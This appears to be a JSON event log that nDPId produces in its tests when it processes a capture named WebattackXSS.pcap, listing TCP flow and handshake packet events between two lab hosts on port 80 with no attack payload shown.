-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347466553,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347466553,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KvdAAD4GmtmsEAABwKgKMuCWAFD9ZuXtAAAAAKACchDKcwAAAgQFtAQCCAoBOs8aAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4JYOrdMQ\/Wbl7qAScSBFIQAAAgQFtAQCCAoD5KCPATrPGgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1499347466554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347466554,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvhAAD4GmuCsEAABwKgKMuCWAFD9ZuXuDq3TEYAQAOXkKAAAAQEICgE6zxoD5KCP"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347467793,"flow_last_seen":1499347467793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347467793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1499347467793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82olAAD4G60asEAABwKgKMuCkAFDARwrZAAAAAKACchDhYwAAAgQFtAQCCAoBOtBQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":1499347467794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467794,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4KSQwyNLwEcK2qAScSCIigAAAgQFtAQCCAoD5KHFATrQUAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":1499347467794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347467794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02opAAD4G602sEAABwKgKMuCkAFDARwrakMMjTIAQAOUnkgAAAQEICgE60FAD5KHF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347469060,"flow_last_seen":1499347469060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347469060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1499347469060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H0RAAD4GpoysEAABwKgKMuCyAFAQe87JAAAAAKACchDL9AAAAgQFtAQCCAoBOtGNAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":1499347469061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4LKyNukIEHvOyqAScSCKrQAAAgQFtAQCCAoD5KMCATrRjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":1499347469061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347469061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H0VAAD4GppOsEAABwKgKMuCyAFAQe87KsjbpCYAQAOUptQAAAQEICgE60Y0D5KMC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347470328,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347470328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvtAAD4GktWsEAABwKgKMuDAAFBLw+AxAAAAAKACchB9+QAAAgQFtAQCCAoBOtLKAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4MBkpV8JS8PgMqAScSATBgAAAgQFtAQCCAoD5KQ\/ATrSygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":1499347470328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvxAAD4GktysEAABwKgKMuDAAFBLw+AyZKVfCoAQAOWyDQAAAQEICgE60soD5KQ\/"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347471594,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347471594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VndAAD4Gb1msEAABwKgKMuDOAFAlMIJxAAAAAKACchABAwAAAgQFtAQCCAoBOtQGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4M5lR7ajJTCCcqAScSA8lgAAAgQFtAQCCAoD5KV8ATrUBgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":1499347471594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VnhAAD4Gb2CsEAABwKgKMuDOAFAlMIJyZUe2pIAQAOXbnQAAAQEICgE61AYD5KV8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347474100,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347474100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IdhAAD4Go\/isEAABwKgKMuDoAFDgcfehAAAAAKACchDOAwAAAgQFtAQCCAoBOtZ5AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":1499347474100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4OgnZn4J4HH3oqAScSB9oAAAAgQFtAQCCAoD5KfuATrWeQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":1499347474101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347474101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IdlAAD4Go\/+sEAABwKgKMuDoAFDgcfeiJ2Z+CoAQAOUcqAAAAQEICgE61nkD5Kfu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347475384,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yGtAAD4G\/WSsEAABwKgKMuD2AFCdWh\/RAAAAAKACchDnnAAAAgQFtAQCCAoBOte6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":1499347475384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4PYsYAVjnVof0qAScSAJpQAAAgQFtAQCCAoD5KkvATrXugEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":1499347475385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347475385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yGxAAD4G\/WusEAABwKgKMuD2AFCdWh\/SLGAFZIAQAOWorAAAAQEICgE617oD5Kkv"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347476667,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347476667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86aJAAD4G3C2sEAABwKgKMuEEAFDYCDFYAAAAAKACchCaGQAAAgQFtAQCCAoBOtj6AAAAAAEDAwc="} 